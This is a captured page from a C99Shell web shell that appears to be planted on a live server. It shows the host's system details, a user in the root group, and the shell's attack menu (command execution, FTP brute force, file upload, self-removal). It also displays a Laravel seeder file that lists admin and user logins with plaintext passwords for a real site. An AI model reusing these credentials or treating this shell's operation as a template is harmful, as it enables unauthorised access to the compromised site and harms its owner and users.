!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/database/seeders/   drwxr-xr-x
Free 28.25 GB of 117.98 GB (23.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     UserSeeder.php (3.01 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Database\Seeders;

use 
App\Models\Admin;
use 
App\Models\User;
use 
Carbon\Carbon;
use 
Illuminate\Database\Seeder;
use 
Illuminate\Support\Str;
use 
Spatie\Permission\Models\Role;

class 
UserSeeder extends Seeder
{
    
/**
     * Run the database seeds.
     *
     * @return void
     */
    
public function run()
    {
        
//Role
        
$role Role::first();

        
$admin Admin::firstOrCreate(
            [
'email' => 'developer@mail.com'],
            [
                
'name' => 'Zakir Soft',
                
'image' => 'backend/image/default-user.png',
                
'password' => bcrypt('password@12345'),
                
'email_verified_at' => Carbon::now(),
                
'remember_token' => Str::random(10),
            ]
        );
        
$admin->assignRole($role);

        
$admin Admin::firstOrCreate(
            [
'email' => 'admin@mail.com'],
            [
                
'name' => 'Admin',
                
'image' => 'backend/image/default-user.png',
                
'password' => bcrypt('password'),
                
'email_verified_at' => Carbon::now(),
                
'remember_token' => Str::random(10),
            ]
        );
        
$admin->assignRole($role);

        
// customer
        
$user User::firstOrCreate(
            [
'email' => 'customer@mail.com'],
            [
                
'name' => 'Customer',
                
'username' => 'customer',
                
'phone' => '01234567891',
                
'web' => 'https://demo.com',
                
'address' => 'Flor: 4, House: 34/4, Road: 3, Block: A, Dhaka Uddan, Mohammadpur, Dhaka 1207',
                
'bio' => 'As an Adlisting user, I effortlessly showcase and sell products, connecting with buyers for successful transactions.',
                
'password' => bcrypt('password'),
                
'email_verified_at' => Carbon::now(),
            ]
        );

        
$user User::firstOrCreate(
            [
'email' => 'johnwick@mail.com'],
            [
                
'name' => 'John Wick',
                
'username' => 'johnwick',
                
'phone' => '01234567892',
                
'web' => 'https://demo1.com',
                
'address' => 'Flor: 4, House: 34/4, Road: 3, Block: A, Dhaka Uddan, Mohammadpur, Dhaka 1207',
                
'bio' => 'As an Adlisting user, I effortlessly showcase and sell products, connecting with buyers for successful transactions.',
                
'password' => bcrypt('password'),
            ]
        );

        
$user User::firstOrCreate(
            [
'email' => 'johndoe@mail.com'],
            [
                
'name' => 'John Doe',
                
'username' => 'johndoe',
                
'phone' => '0123456789',
                
'web' => 'https://demo2.com',
                
'address' => 'Flor: 4, House: 34/4, Road: 3, Block: A, Dhaka Uddan, Mohammadpur, Dhaka 1207',
                
'bio' => 'As an Adlisting user, I effortlessly showcase and sell products, connecting with buyers for successful transactions.',
                
'password' => bcrypt('password'),
            ]
        );
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--